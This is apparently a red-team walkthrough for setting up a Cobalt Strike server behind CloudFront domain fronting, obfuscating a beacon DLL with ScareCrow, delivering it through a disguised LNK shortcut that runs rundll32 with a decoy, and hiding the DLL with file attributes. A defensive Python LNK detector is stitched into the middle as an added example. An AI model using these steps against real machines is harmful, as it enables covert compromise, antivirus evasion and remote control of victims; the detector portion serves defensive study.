Clone the repo and build the container

git clone https://gitea.127-0-0-1.fr/vx3r/cobalt-strike-docker
cd cobalt-strike-docker
docker build -t cobalt-strike .

Docker compose snippet

  cobalt-strike:
    image: cobalt-strike
    container_name: cobalt-strike
    restart: unless-stopped
    networks:
      my-docker-subnet:
        ipv4_address: 10.2.2.29
        ipv6_address: fd00:bbbb::10:2:2:29
    expose:
      - "8080"
      - "8443"
      - "50050"
    environment:
      - VIRTUAL_EXPOSE=false
    volumes:
      - ./../cobalt-strike:/data

Allow Cobalt Strike clients from specific IPs to reach the client port 50050. Example nftables rules in the prerouting chain; add a matching forward rule if needed

define CS_IP = 10.2.2.29
ip saddr <allowed IP> ip daddr <CS server public IP> tcp dport 50050 dnat ip to $CS_IP
ip saddr <aws cloudfront IP> ip daddr <CS server public IP> tcp dport { 8080, 8443 } dnat ip to $CS_IP

Set up CloudFront domain fronting (link 1, link 2)

Choose which headers to include in the cache key: select All to forward every header to the origin CS server

Download ScareCrow and install dependencies

wget https://github.com/optiv/ScareCrow/releases/download/v4.11/ScareCrow_4.11_linux_amd64
mv ScareCrow_4.11_linux_amd64 ScareCrow
chmod +x ScareCrow
apt install openssl osslsigncode mingw-w64 golang-go
go install mvdan.cc/garble@latest

Create CS listener

Cobalt Strike listener

Generate raw beacon with the listener

Obfuscate with ScareCrow

./ScareCrow -I beacon.bin -Loader dll -domain www.microsoft.com

Create an LNK file, for example with Macro Pack

echo '"c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer"' | .\macro_pack.exe -G photo.lnk

Edit the LNK file: change its icon and target

"C:\Windows\System32\cmd.exe" /c start c:\Windows\System32\rundll32.exe .\dpapi.dll,DllRegisterServer & C:\Windows\explorer.exe

This runs the beacon and then opens, for example, Explorer if the icon is a folder; vary the decoy to match the icon (PDF icon, open a legitimate PDF file…)
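A defender's check for shortcuts of the kind described above, added here as an example that is not part of the original walkthrough: a minimal parser for the Shell Link (MS-SHLLINK) string data that flags a target path or argument string launching a DLL through rundll32 with the DllRegisterServer export. The .lnk bytes it runs over are constructed inline as a test fixture; the field layout (LinkFlags at offset 0x14, u16-counted strings) follows the public specification, and cp1252 is assumed for non-Unicode links.

```python
import re
import struct

# LinkFlags bits from the MS-SHLLINK header (offset 0x14)
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKING_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = [(HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORKING_DIR, "working_dir"), (HAS_ARGS, "arguments"),
                 (HAS_ICON, "icon_location")]
# rundll32 loading a DLL export named DllRegisterServer, the pattern used by the shortcut target
SUSPICIOUS = re.compile(r"rundll32(\.exe)?\s+\S+\.dll\s*,\s*DllRegisterServer", re.I)


def parse_lnk_strings(data: bytes) -> dict:
    """Return the StringData fields of a .lnk (name, relative path, working dir, arguments, icon)."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00":
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    pos = 0x4C                                    # fixed-size ShellLinkHeader
    if flags & HAS_ID_LIST:                       # LinkTargetIDList: u16 size, then the items
        pos += 2 + struct.unpack_from("<H", data, pos)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfo: u32 size that includes itself
        pos += struct.unpack_from("<I", data, pos)[0]
    enc, width = ("utf-16-le", 2) if flags & IS_UNICODE else ("cp1252", 1)  # cp1252 assumed for ANSI
    fields = {}
    for bit, key in STRING_FIELDS:                # each string: u16 char count, no terminator
        if flags & bit:
            count = struct.unpack_from("<H", data, pos)[0]
            pos += 2
            fields[key] = data[pos:pos + count * width].decode(enc)
            pos += count * width
    return fields


def is_suspicious_lnk(data: bytes) -> bool:
    """True when the shortcut's target path or arguments launch a DLL via rundll32/DllRegisterServer."""
    fields = parse_lnk_strings(data)
    cmdline = " ".join(fields.get(k, "") for k in ("relative_path", "arguments"))
    return SUSPICIOUS.search(cmdline) is not None


def sample_lnk(arguments: str) -> bytes:
    """Constructed test fixture, not a real shortcut: header plus RELATIVE_PATH and ARGUMENTS only."""
    clsid = b"\x01\x14\x02\x00\x00\x00\x00\x00\xc0\x00\x00\x00\x00\x00\x00\x46"
    flags = HAS_REL_PATH | HAS_ARGS | IS_UNICODE
    header = struct.pack("<I16sIIqqqIiIHHII", 0x4C, clsid, flags, 0, 0, 0, 0, 0, 0, 1, 0, 0, 0, 0)

    def string_data(text: str) -> bytes:          # u16 count followed by UTF-16LE characters
        return struct.pack("<H", len(text)) + text.encode("utf-16-le")

    return header + string_data(r"..\Windows\System32\cmd.exe") + string_data(arguments)
```

Point `is_suspicious_lnk` at the bytes of real shortcuts (for example attachments or files on removable media) to triage them; links with a LinkTargetIDList or LinkInfo block are skipped over correctly, but their target is then only visible in the arguments field this parser reads.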

Make the DLL file harder to notice by setting the Hidden, Read-only and System attributes on it

attrib +h +r +s /s dpapi.dll